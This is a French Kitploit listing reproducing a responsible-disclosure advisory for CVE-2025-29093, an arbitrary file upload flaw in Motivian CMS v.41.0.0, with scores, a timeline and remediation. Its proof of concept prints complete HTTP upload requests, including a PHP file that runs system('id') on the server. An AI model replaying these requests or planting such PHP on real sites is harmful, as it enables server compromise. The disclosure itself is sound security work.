Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — Ce dépôt révèle une vulnérabilité de sécurité découverte dans le système de gestion de contenu Motivian v.41.0.0 | Kitploit
Outils/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

Ce dépôt révèle une vulnérabilité de sécurité découverte dans le système de gestion de contenu Motivian v.41.0.0

Voir le dépôt
3il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-29093-Téléchargement-Arbitraire-de-Fichier

Ce dépôt révèle une vulnérabilité de sécurité découverte dans Motivian Content Management System v.41.0.0.

  • CVE-2025-29093 : Téléchargement arbitraire de fichier

Cette vulnérabilité a été signalée au vendeur conformément aux pratiques de divulgation responsable, ainsi qu'à MITRE, qui a attribué un ID CVE provisoire. Les détails sont rendus publics après l'expiration de la période de divulgation de 45 jours.

Informations générales

  • Titre : Motivian Téléchargement arbitraire de fichier
  • Type de vulnérabilité : Téléchargement arbitraire de fichier
  • Vendeur du produit : Motivian
  • Produit : Motivian Content Management System
  • Version affectée : Motivian CMS v.41.0.0
  • Composant affecté : Content/Gallery/Images
  • Vecteur d'attaque : À distance
  • Impact : Téléchargement arbitraire malveillant de fichier
  • Sévérité : Moyenne
  • Score CVSSv3 : 6.5
  • Vecteur CVSSv3 : CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • Sévérité selon CISA-ADP : Élevée
  • Score CVSSv3 selon CISA-ADP : 8.2
  • Vecteur CVSSv3 selon CISA-ADP : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • Trouvé : 2025-02-03
  • Par : Francesco Marcuccio
  • Statut : Signalé au vendeur le 7 avril 2025 - Aucune réponse/correctif reçu au 22 mai 2025

Description

Une vulnérabilité de téléchargement de fichier dans Motivian Content Management System v.41.0.0 permet à un attaquant distant de télécharger des fichiers arbitraires avec des extensions modifiées (ex. .php, .png, .txt) contenant du code malveillant, via le composant Content/Gallery/Images.

Preuve de concept

La vulnérabilité peut être exploitée en téléchargeant des fichiers avec diverses extensions. À des fins de démonstration, deux cas de preuve de concept ont été utilisés : l'un impliquant un fichier .php contenant du code malveillant, et l'autre utilisant un fichier .txt avec la chaîne de test EICAR. Les deux fichiers ont été téléchargés via le composant Content/Gallery/Images.

Voici la transcription complète des requêtes et réponses HTTP utilisées pour démontrer le problème :

Requête Burp EICAR

POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

Requête Burp PHP

POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

Réponse Burp

HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

Remédiation

Ne pas autoriser les utilisateurs à télécharger des fichiers arbitraires. Mettre en œuvre une validation stricte des fichiers (type MIME et inspection du contenu), randomiser les noms de fichiers et restreindre les répertoires de téléchargement.

Calendrier de divulgation

DateAction
2025-02-06Demande d'ID CVE (CNA: MITRE)
2025-04-02Attribution de l'ID CVE
2025-04-07Vulnérabilités signalées au vendeur
2025-05-31Divulgation publique après expiration de la période de divulgation de 45 jours (54 jours au total)
2025-06-04Enregistrement officiel et entrée dans la base de données MITRE et le portail NIST/NVD

Crédits

  • Découvert et divulgué de manière responsable par :
    Francesco Marcuccio
    Consultant en cybersécurité, Testeur d'intrusion

  • Attribution du découvreur MITRE mentionné comme :
    Francesco Marcuccio
    Consultant en cybersécurité, Testeur d'intrusion

Liens

Liens de référence : MITRE NIST

Statut

Cet ID CVE est officiellement en statut PUBLIÉ. Il sera mis à jour avec un score CVSS par NIST, après analyse.

Télécharger l’outil